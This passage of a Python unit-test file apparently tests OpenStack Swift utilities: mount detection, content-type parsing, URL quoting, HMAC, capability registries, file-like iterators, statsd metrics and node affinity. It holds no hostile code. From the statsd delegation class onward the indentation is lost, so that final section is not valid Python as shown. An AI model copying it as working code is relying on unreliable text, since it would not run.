        missing = os.path.join(workdir, 'bar')
        self.assertFalse(utils.ismount(missing))
    finally:
        shutil.rmtree(workdir)
def test_ismount_path_not_mount(self):
    """A plain directory inside a filesystem is not a mount point."""
    workdir = mkdtemp()
    try:
        self.assertFalse(utils.ismount(workdir))
    finally:
        shutil.rmtree(workdir)
def test_ismount_path_error(self):
    """A permission-style lstat() failure propagates as OSError."""
    def _raise_eacces(path):
        # errno 13 == EACCES; ismount must not swallow it.
        raise OSError(13, "foo")

    workdir = mkdtemp()
    try:
        with patch("os.lstat", _raise_eacces):
            self.assertRaises(OSError, utils.ismount, workdir)
    finally:
        shutil.rmtree(workdir)
def test_ismount_path_is_symlink(self):
    """A symlink is never reported as a mount point."""
    workdir = mkdtemp()
    try:
        link = os.path.join(workdir, "tmp")
        os.symlink("/tmp", link)
        self.assertFalse(utils.ismount(link))
    finally:
        shutil.rmtree(workdir)
def test_ismount_path_is_root(self):
    """The filesystem root is always a mount point."""
    self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
    """An lstat() failure on the parent ('..') also propagates."""
    real_lstat = os.lstat

    def _mock_os_lstat(path):
        # Fail only when ismount stats the parent directory.
        if path.endswith(".."):
            raise OSError(13, "foo")
        return real_lstat(path)

    workdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            self.assertRaises(OSError, utils.ismount, workdir)
    finally:
        shutil.rmtree(workdir)
def test_ismount_successes_dev(self):
    """ismount() returns True when the parent ('..') reports a
    different st_dev than the path itself (device-boundary check)."""
    _os_lstat = os.lstat

    class MockStat(object):
        # Minimal stat result carrying only the fields ismount reads.
        def __init__(self, mode, dev, ino):
            self.st_mode = mode
            self.st_dev = dev
            self.st_ino = ino

    def _mock_os_lstat(path):
        if path.endswith(".."):
            # Force the parent onto a different device number so the
            # devices can never match.
            parent = _os_lstat(path)
            return MockStat(parent.st_mode, parent.st_dev + 1,
                            parent.st_ino)
        else:
            return _os_lstat(path)

    tmpdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            self.assertTrue(utils.ismount(tmpdir))
    finally:
        shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
    """ismount() returns True for the mocked stat tree.

    NOTE(review): MockStat's signature is (mode, dev, ino), but the
    non-parent branch passes (child.st_mode, parent.st_ino,
    child.st_dev) — the parent's inode ends up in st_dev and the
    child's device in st_ino. That likely makes the *device*
    comparison, not the inode one, the reason ismount returns True;
    verify against utils.ismount before trusting the test name.
    """
    _os_lstat = os.lstat

    class MockStat(object):
        # Minimal stat result carrying only the fields ismount reads.
        def __init__(self, mode, dev, ino):
            self.st_mode = mode
            self.st_dev = dev
            self.st_ino = ino

    def _mock_os_lstat(path):
        if path.endswith(".."):
            # The parent directory keeps its real stat values.
            return _os_lstat(path)
        else:
            parent_path = os.path.join(path, "..")
            child = _os_lstat(path)
            parent = _os_lstat(parent_path)
            return MockStat(child.st_mode, parent.st_ino,
                            child.st_dev)

    tmpdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            self.assertTrue(utils.ismount(tmpdir))
    finally:
        shutil.rmtree(tmpdir)
def test_parse_content_type(self):
    """parse_content_type() splits the type from ;-separated params."""
    expectations = [
        ('text/plain', ('text/plain', [])),
        ('text/plain;charset=utf-8',
         ('text/plain', [('charset', 'utf-8')])),
        # Quoted parameter values keep their quotes.
        ('text/plain;hello="world";charset=utf-8',
         ('text/plain', [('hello', '"world"'), ('charset', 'utf-8')])),
        ('text/plain; hello="world"; a=b',
         ('text/plain', [('hello', '"world"'), ('a', 'b')])),
        # Escaped quotes inside a quoted value survive intact.
        (r'text/plain; x="\""; a=b',
         ('text/plain', [('x', r'"\""'), ('a', 'b')])),
        # A parameter without '=' yields an empty value.
        (r'text/plain; x; a=b',
         ('text/plain', [('x', ''), ('a', 'b')])),
        (r'text/plain; x="\""; a',
         ('text/plain', [('x', r'"\""'), ('a', '')])),
    ]
    for content_type, expected in expectations:
        self.assertEqual(expected, utils.parse_content_type(content_type))
def test_override_bytes_from_content_type(self):
    """A numeric swift_bytes content-type param overrides 'bytes' and
    is stripped; an unparsable value is ignored but still stripped."""
    listing = {'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
               'content_type': 'text/plain; hello="world"; swift_bytes=15'}
    utils.override_bytes_from_content_type(listing, logger=FakeLogger())
    self.assertEqual(15, listing['bytes'])
    self.assertEqual('text/plain;hello="world"', listing['content_type'])
    # Non-numeric swift_bytes: 'bytes' keeps its original value, but
    # the bogus parameter is still removed from the content type.
    listing = {'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
               'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
    utils.override_bytes_from_content_type(listing, logger=FakeLogger())
    self.assertEqual(1234, listing['bytes'])
    self.assertEqual('text/plain;hello="world"', listing['content_type'])
def test_quote(self):
    """utils.quote() percent-encodes, honors `safe`, and quotes the
    repaired output of get_valid_utf8_str() for invalid UTF-8."""
    self.assertEqual('/v1/a/c3/subdirx/',
                     utils.quote('/v1/a/c3/subdirx/'))
    self.assertEqual('/v1/a%26b/c3/subdirx/',
                     utils.quote('/v1/a&b/c3/subdirx/'))
    # With safe='&' the ampersand survives but '/' gets encoded.
    self.assertEqual('%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F',
                     utils.quote('/v1/a&b/c3/subdirx/', safe='&'))
    unicode_sample = u'\uc77c\uc601'
    valid_utf8_str = utils.get_valid_utf8_str('abc_' + unicode_sample)
    # Reversing the UTF-8 bytes yields an invalid sequence; the bad
    # bytes are replaced (U+FFFD, %EF%BF%BD) before quoting.
    reversed_bytes = unicode_sample.encode('utf-8')[::-1]
    invalid_utf8_str = utils.get_valid_utf8_str('abc_' + reversed_bytes)
    self.assertEqual('abc_%EC%9D%BC%EC%98%81',
                     utils.quote(valid_utf8_str))
    self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
                     utils.quote(invalid_utf8_str))
def test_get_hmac(self):
    """get_hmac() is deterministic for a fixed request, expiry and key."""
    expected = 'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f'
    self.assertEqual(expected, utils.get_hmac('GET', '/path', 1, 'abc'))
class TestSwiftInfo(unittest.TestCase):
    """Tests for the register_swift_info()/get_swift_info() registries."""

    def tearDown(self):
        # Reset the module-level registries between tests.
        utils._swift_info = {}
        utils._swift_admin_info = {}

    def test_register_swift_info(self):
        utils.register_swift_info(foo='bar')
        utils.register_swift_info(lorem='ipsum')
        utils.register_swift_info('cap1', cap1_foo='cap1_bar')
        utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
        self.assertIn('swift', utils._swift_info)
        self.assertIn('foo', utils._swift_info['swift'])
        self.assertEqual('bar', utils._swift_info['swift']['foo'])
        self.assertIn('lorem', utils._swift_info['swift'])
        self.assertEqual('ipsum', utils._swift_info['swift']['lorem'])
        self.assertIn('cap1', utils._swift_info)
        self.assertIn('cap1_foo', utils._swift_info['cap1'])
        self.assertEqual('cap1_bar', utils._swift_info['cap1']['cap1_foo'])
        self.assertIn('cap1_lorem', utils._swift_info['cap1'])
        self.assertEqual('cap1_ipsum',
                         utils._swift_info['cap1']['cap1_lorem'])
        # 'admin' and 'disallowed_sections' are reserved section names.
        self.assertRaises(ValueError,
                          utils.register_swift_info, 'admin', foo='bar')
        self.assertRaises(ValueError,
                          utils.register_swift_info, 'disallowed_sections',
                          disallowed_sections=None)

    def test_get_swift_info(self):
        utils._swift_info = {'swift': {'foo': 'bar'},
                             'cap1': {'cap1_foo': 'cap1_bar'}}
        utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
        info = utils.get_swift_info()
        # Admin-only data must not leak into the public view.
        self.assertNotIn('admin', info)
        self.assertIn('swift', info)
        self.assertIn('foo', info['swift'])
        self.assertEqual('bar', utils._swift_info['swift']['foo'])
        self.assertIn('cap1', info)
        self.assertIn('cap1_foo', info['cap1'])
        self.assertEqual('cap1_bar', utils._swift_info['cap1']['cap1_foo'])

    def test_get_swift_info_with_disallowed_sections(self):
        utils._swift_info = {'swift': {'foo': 'bar'},
                             'cap1': {'cap1_foo': 'cap1_bar'},
                             'cap2': {'cap2_foo': 'cap2_bar'},
                             'cap3': {'cap3_foo': 'cap3_bar'}}
        utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
        info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
        self.assertNotIn('admin', info)
        self.assertIn('swift', info)
        self.assertIn('foo', info['swift'])
        self.assertEqual('bar', info['swift']['foo'])
        # Only the sections named in disallowed_sections are filtered.
        self.assertNotIn('cap1', info)
        self.assertIn('cap2', info)
        self.assertIn('cap2_foo', info['cap2'])
        self.assertEqual('cap2_bar', info['cap2']['cap2_foo'])
        self.assertNotIn('cap3', info)

    def test_register_swift_admin_info(self):
        utils.register_swift_info(admin=True, admin_foo='admin_bar')
        utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
        utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
        utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
        self.assertIn('swift', utils._swift_admin_info)
        self.assertIn('admin_foo', utils._swift_admin_info['swift'])
        self.assertEqual(
            'admin_bar', utils._swift_admin_info['swift']['admin_foo'])
        self.assertIn('admin_lorem', utils._swift_admin_info['swift'])
        self.assertEqual(
            'admin_ipsum', utils._swift_admin_info['swift']['admin_lorem'])
        self.assertIn('cap1', utils._swift_admin_info)
        self.assertIn('ac1_foo', utils._swift_admin_info['cap1'])
        self.assertEqual(
            'ac1_bar', utils._swift_admin_info['cap1']['ac1_foo'])
        self.assertIn('ac1_lorem', utils._swift_admin_info['cap1'])
        self.assertEqual(
            'ac1_ipsum', utils._swift_admin_info['cap1']['ac1_lorem'])
        # Admin registrations must not pollute the public registry.
        self.assertNotIn('swift', utils._swift_info)
        self.assertNotIn('cap1', utils._swift_info)

    def test_get_swift_admin_info(self):
        utils._swift_info = {'swift': {'foo': 'bar'},
                             'cap1': {'cap1_foo': 'cap1_bar'}}
        utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
        info = utils.get_swift_info(admin=True)
        self.assertIn('admin', info)
        self.assertIn('admin_cap1', info['admin'])
        self.assertIn('ac1_foo', info['admin']['admin_cap1'])
        self.assertEqual('ac1_bar', info['admin']['admin_cap1']['ac1_foo'])
        self.assertIn('swift', info)
        self.assertIn('foo', info['swift'])
        self.assertEqual('bar', utils._swift_info['swift']['foo'])
        self.assertIn('cap1', info)
        self.assertIn('cap1_foo', info['cap1'])
        self.assertEqual('cap1_bar', utils._swift_info['cap1']['cap1_foo'])

    def test_get_swift_admin_info_with_disallowed_sections(self):
        utils._swift_info = {'swift': {'foo': 'bar'},
                             'cap1': {'cap1_foo': 'cap1_bar'},
                             'cap2': {'cap2_foo': 'cap2_bar'},
                             'cap3': {'cap3_foo': 'cap3_bar'}}
        utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
        info = utils.get_swift_info(
            admin=True, disallowed_sections=['cap1', 'cap3'])
        self.assertIn('admin', info)
        self.assertIn('admin_cap1', info['admin'])
        self.assertIn('ac1_foo', info['admin']['admin_cap1'])
        self.assertEqual('ac1_bar', info['admin']['admin_cap1']['ac1_foo'])
        # The admin view records which sections were withheld.
        self.assertIn('disallowed_sections', info['admin'])
        self.assertIn('cap1', info['admin']['disallowed_sections'])
        self.assertNotIn('cap2', info['admin']['disallowed_sections'])
        self.assertIn('cap3', info['admin']['disallowed_sections'])
        self.assertIn('swift', info)
        self.assertIn('foo', info['swift'])
        self.assertEqual('bar', info['swift']['foo'])
        self.assertNotIn('cap1', info)
        self.assertIn('cap2', info)
        self.assertIn('cap2_foo', info['cap2'])
        self.assertEqual('cap2_bar', info['cap2']['cap2_foo'])
        self.assertNotIn('cap3', info)
class TestFileLikeIter(unittest.TestCase):
    """Exercise utils.FileLikeIter's file-like facade over an iterable."""

    def test_iter_file_iter(self):
        # Iterating the wrapper yields the underlying chunks unchanged.
        source = ['abc', 'de', 'fghijk', 'l']
        self.assertEqual(source,
                         [chunk for chunk in utils.FileLikeIter(source)])

    def test_next(self):
        source = ['abc', 'de', 'fghijk', 'l']
        wrapper = utils.FileLikeIter(source)
        collected = []
        while True:
            try:
                collected.append(wrapper.next())
            except StopIteration:
                break
        self.assertEqual(source, collected)

    def test_read(self):
        source = ['abc', 'de', 'fghijk', 'l']
        # read() with no size slurps everything.
        self.assertEqual(''.join(source), utils.FileLikeIter(source).read())

    def test_read_with_size(self):
        source = ['abc', 'de', 'fghijk', 'l']
        wrapper = utils.FileLikeIter(source)
        collected = []
        while True:
            piece = wrapper.read(2)
            if not piece:
                break
            # Never more than the requested size, even across chunks.
            self.assertTrue(len(piece) <= 2)
            collected.append(piece)
        self.assertEqual(''.join(source), ''.join(collected))

    def test_read_with_size_zero(self):
        # makes little sense, but file supports it, so...
        self.assertEqual('', utils.FileLikeIter('abc').read(0))

    def test_readline(self):
        source = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        wrapper = utils.FileLikeIter(source)
        collected = []
        while True:
            line = wrapper.readline()
            if not line:
                break
            collected.append(line)
        expected = [v if v == 'trailing.' else v + '\n'
                    for v in ''.join(source).split('\n')]
        self.assertEqual(expected, collected)

    def test_readline2(self):
        # readline(size) stops at the size even without a newline.
        self.assertEqual(
            'abcd',
            utils.FileLikeIter(['abc', 'def\n']).readline(4))

    def test_readline3(self):
        # A line spanning a large chunk boundary is returned whole.
        self.assertEqual(
            ('a' * 1111) + 'bc\n',
            utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline())

    def test_readline_with_size(self):
        source = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        wrapper = utils.FileLikeIter(source)
        collected = []
        while True:
            line = wrapper.readline(2)
            if not line:
                break
            collected.append(line)
        self.assertEqual(
            ['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n',
             'k\n', 'tr', 'ai', 'li', 'ng', '.'],
            collected)

    def test_readlines(self):
        source = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        expected = [v if v == 'trailing.' else v + '\n'
                    for v in ''.join(source).split('\n')]
        self.assertEqual(expected, utils.FileLikeIter(source).readlines())

    def test_readlines_with_size(self):
        source = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        wrapper = utils.FileLikeIter(source)
        batches = []
        while True:
            batch = wrapper.readlines(2)
            if not batch:
                break
            batches.append(batch)
        self.assertEqual(
            [['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
             ['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']],
            batches)

    def test_close(self):
        wrapper = utils.FileLikeIter('abcdef')
        self.assertEqual('a', wrapper.next())
        wrapper.close()
        self.assertTrue(wrapper.closed)
        # Every read-style method must refuse to work after close().
        for method in (wrapper.next, wrapper.read, wrapper.readline,
                       wrapper.readlines):
            self.assertRaises(ValueError, method)
        # Just make sure repeated close calls don't raise an Exception
        wrapper.close()
        self.assertTrue(wrapper.closed)
class TestStatsdLogging(unittest.TestCase):
    """White-box tests for get_logger()'s optional statsd client wiring."""

    def test_get_logger_statsd_client_not_specified(self):
        # Without log_statsd_host in the conf, no client is attached.
        logger = utils.get_logger({}, 'some-name', log_route='some-route')
        # white-box construction validation
        self.assertEqual(None, logger.logger.statsd_client)

    def test_get_logger_statsd_client_defaults(self):
        # Only log_statsd_host set: port, prefix, and sample rate default.
        logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
                                  'some-name', log_route='some-route')
        # white-box construction validation
        self.assert_(isinstance(logger.logger.statsd_client,
                                utils.StatsdClient))
        self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
        self.assertEqual(logger.logger.statsd_client._port, 8125)
        self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
        self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
        # set_statsd_prefix() replaces the prefix (trailing dot added);
        # an empty prefix clears it entirely.
        logger.set_statsd_prefix('some-name.more-specific')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'some-name.more-specific.')
        logger.set_statsd_prefix('')
        self.assertEqual(logger.logger.statsd_client._prefix, '')

    def test_get_logger_statsd_client_non_defaults(self):
        logger = utils.get_logger({
            'log_statsd_host': 'another.host.com',
            'log_statsd_port': '9876',
            'log_statsd_default_sample_rate': '0.75',
            'log_statsd_sample_rate_factor': '0.81',
            'log_statsd_metric_prefix': 'tomato.sauce',
        }, 'some-name', log_route='some-route')
        # The metric prefix is prepended ahead of the logger name.
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'tomato.sauce.some-name.')
        logger.set_statsd_prefix('some-name.more-specific')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'tomato.sauce.some-name.more-specific.')
        logger.set_statsd_prefix('')
        self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
        self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
        self.assertEqual(logger.logger.statsd_client._port, 9876)
        self.assertEqual(logger.logger.statsd_client._default_sample_rate,
                         0.75)
        self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
                         0.81)

    def test_sample_rates(self):
        logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
        mock_socket = MockUdpSocket()
        # encapsulation? what's that?
        statsd_client = logger.logger.statsd_client
        self.assertTrue(statsd_client.random is random.random)
        statsd_client._open_socket = lambda *_: mock_socket
        # random() above the sample rate: the packet is dropped...
        statsd_client.random = lambda: 0.50001
        logger.increment('tribbles', sample_rate=0.5)
        self.assertEqual(len(mock_socket.sent), 0)
        # ...below the sample rate: the packet is sent, tagged |@rate.
        statsd_client.random = lambda: 0.49999
        logger.increment('tribbles', sample_rate=0.5)
        self.assertEqual(len(mock_socket.sent), 1)
        payload = mock_socket.sent[0][0]
        self.assertTrue(payload.endswith("|@0.5"))

    def test_sample_rates_with_sample_rate_factor(self):
        logger = utils.get_logger({
            'log_statsd_host': 'some.host.com',
            'log_statsd_default_sample_rate': '0.82',
            'log_statsd_sample_rate_factor': '0.91',
        })
        # Effective rate is default_sample_rate * sample_rate_factor.
        effective_sample_rate = 0.82 * 0.91
        mock_socket = MockUdpSocket()
        # encapsulation? what's that?
        statsd_client = logger.logger.statsd_client
        self.assertTrue(statsd_client.random is random.random)
        statsd_client._open_socket = lambda *_: mock_socket
        statsd_client.random = lambda: effective_sample_rate + 0.001
        logger.increment('tribbles')
        self.assertEqual(len(mock_socket.sent), 0)
        statsd_client.random = lambda: effective_sample_rate - 0.001
        logger.increment('tribbles')
        self.assertEqual(len(mock_socket.sent), 1)
        payload = mock_socket.sent[0][0]
        self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
                        payload)
        # An explicit per-call sample_rate is also scaled by the factor.
        effective_sample_rate = 0.587 * 0.91
        statsd_client.random = lambda: effective_sample_rate - 0.001
        logger.increment('tribbles', sample_rate=0.587)
        self.assertEqual(len(mock_socket.sent), 2)
        payload = mock_socket.sent[1][0]
        self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
                        payload)

    def test_timing_stats(self):
        # MockController doubles as its own logger, recording the
        # timing_since() call that the decorator makes.
        class MockController(object):
            def __init__(self, status):
                self.status = status
                self.logger = self
                self.args = ()
                self.called = 'UNKNOWN'

            def timing_since(self, *args):
                self.called = 'timing'
                self.args = args

        @utils.timing_stats()
        def METHOD(controller):
            return Response(status=controller.status)

        # 200 and 404 responses are recorded under METHOD.timing...
        mock_controller = MockController(200)
        METHOD(mock_controller)
        self.assertEquals(mock_controller.called, 'timing')
        self.assertEquals(len(mock_controller.args), 2)
        self.assertEquals(mock_controller.args[0], 'METHOD.timing')
        self.assert_(mock_controller.args[1] > 0)

        mock_controller = MockController(404)
        METHOD(mock_controller)
        self.assertEquals(len(mock_controller.args), 2)
        self.assertEquals(mock_controller.called, 'timing')
        self.assertEquals(mock_controller.args[0], 'METHOD.timing')
        self.assert_(mock_controller.args[1] > 0)

        # ...while a 401 is recorded under METHOD.errors.timing.
        mock_controller = MockController(401)
        METHOD(mock_controller)
        self.assertEquals(len(mock_controller.args), 2)
        self.assertEquals(mock_controller.called, 'timing')
        self.assertEquals(mock_controller.args[0], 'METHOD.errors.timing')
        self.assert_(mock_controller.args[1] > 0)
class UnsafeXrange(object):
    """
    Like xrange(limit), but with extra context switching to screw things up.

    Any overlapping next() calls raise ValueError, which lets tests
    prove that un-serialized concurrent iteration is detected.
    """
    def __init__(self, upper_bound):
        self.current = 0
        self.concurrent_calls = 0
        self.upper_bound = upper_bound

    def __iter__(self):
        return self

    def next(self):
        if self.concurrent_calls > 0:
            # BUG FIX: the message previously contained a bare '%r'
            # with no value interpolated; report the overlap count.
            raise ValueError("concurrent access is bad, mmmkay? (%r)"
                             % (self.concurrent_calls,))
        self.concurrent_calls += 1
        try:
            if self.current >= self.upper_bound:
                raise StopIteration
            else:
                val = self.current
                self.current += 1
                eventlet.sleep()  # yield control to other greenthreads
                return val
        finally:
            # Always release the re-entrancy guard.
            self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
    """affinity_key_function() turns 'rXzY=prio' specs into sort keys."""

    def setUp(self):
        # One node per (region, zone) combination used by the tests.
        self.nodes = [dict(id=node_id, region=region, zone=zone)
                      for node_id, (region, zone) in enumerate(
                          [(1, 1), (1, 2), (2, 1), (2, 2),
                           (3, 1), (3, 2), (4, 0), (4, 1)])]

    def _sorted_ids(self, keyfn):
        # Helper: node ids in the order the key function sorts them.
        return [node['id'] for node in sorted(self.nodes, key=keyfn)]

    def test_single_region(self):
        keyfn = utils.affinity_key_function("r3=1")
        self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], self._sorted_ids(keyfn))

    def test_bogus_value(self):
        # A missing '=' or a non-numeric priority must be rejected.
        self.assertRaises(ValueError,
                          utils.affinity_key_function, "r3")
        self.assertRaises(ValueError,
                          utils.affinity_key_function, "r3=elephant")

    def test_empty_value(self):
        # Empty's okay, it just means no preference
        keyfn = utils.affinity_key_function("")
        self.assertTrue(callable(keyfn))
        self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], self._sorted_ids(keyfn))

    def test_all_whitespace_value(self):
        # Whitespace-only is treated the same as empty.
        keyfn = utils.affinity_key_function(" \n")
        self.assertTrue(callable(keyfn))
        self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], self._sorted_ids(keyfn))

    def test_with_zone_zero(self):
        keyfn = utils.affinity_key_function("r4z0=1")
        self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], self._sorted_ids(keyfn))

    def test_multiple(self):
        keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
        self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], self._sorted_ids(keyfn))

    def test_more_specific_after_less_specific(self):
        keyfn = utils.affinity_key_function("r2=100, r2z2=50")
        self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], self._sorted_ids(keyfn))
class TestAffinityLocalityPredicate(unittest.TestCase):
    """affinity_locality_predicate() builds node filters from 'rXzY' specs."""

    def setUp(self):
        # One node per (region, zone) combination used by the tests.
        self.nodes = [dict(id=node_id, region=region, zone=zone)
                      for node_id, (region, zone) in enumerate(
                          [(1, 1), (1, 2), (2, 1), (2, 2),
                           (3, 1), (3, 2), (4, 0), (4, 1)])]

    def _matching_ids(self, pred):
        # Helper: ids of the nodes the predicate accepts.
        return [node['id'] for node in self.nodes if pred(node)]

    def test_empty(self):
        # An empty spec means no affinity at all: no predicate returned.
        self.assertTrue(utils.affinity_locality_predicate('') is None)

    def test_region(self):
        pred = utils.affinity_locality_predicate('r1')
        self.assertTrue(callable(pred))
        self.assertEqual([0, 1], self._matching_ids(pred))

    def test_zone(self):
        pred = utils.affinity_locality_predicate('r1z1')
        self.assertTrue(callable(pred))
        self.assertEqual([0], self._matching_ids(pred))

    def test_multiple(self):
        pred = utils.affinity_locality_predicate('r1, r3, r4z0')
        self.assertTrue(callable(pred))
        self.assertEqual([0, 1, 4, 5, 6], self._matching_ids(pred))

    def test_invalid(self):
        # Anything that is not a bare rX or rXzY spec is rejected.
        for bogus in ('falafel', 'r8zQ', 'r2d2', 'r1z1=1'):
            self.assertRaises(ValueError,
                              utils.affinity_locality_predicate, bogus)
class TestGreenthreadSafeIterator(unittest.TestCase):
    """GreenthreadSafeIterator must serialize access across greenthreads."""

    def increment(self, iterable):
        # Consume the iterable, returning each value plus one.
        return [value + 1 for value in iterable]

    def test_setup_works(self):
        # it should work without concurrent access
        self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
        iterable = UnsafeXrange(10)
        pile = eventlet.GreenPile(2)
        for _ in xrange(2):
            pile.spawn(self.increment, iterable)
        # Unprotected concurrent iteration must blow up, proving the
        # fixture is nasty enough to need GreenthreadSafeIterator.
        try:
            sorted([resp for resp in pile])
            self.assertTrue(False, "test setup is insufficiently crazy")
        except ValueError:
            pass

    def test_access_is_serialized(self):
        pile = eventlet.GreenPile(2)
        iterable = utils.GreenthreadSafeIterator(UnsafeXrange(10))
        for _ in xrange(2):
            pile.spawn(self.increment, iterable)
        # Both greenthreads together must see every value exactly once.
        response = sorted(sum([resp for resp in pile], []))
        self.assertEqual(range(1, 11), response)
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
    # Listen on an ephemeral UDP port and record which one the OS chose.
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.sock.bind(('localhost', 0))
    self.port = self.sock.getsockname()[1]
    self.queue = Queue()
    # Daemon reader thread shovels received statsd packets into the
    # queue so tests can assert on them; it exits on a 'STOP' packet.
    self.reader_thread = threading.Thread(target=self.statsd_reader)
    self.reader_thread.setDaemon(1)
    self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assert_(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
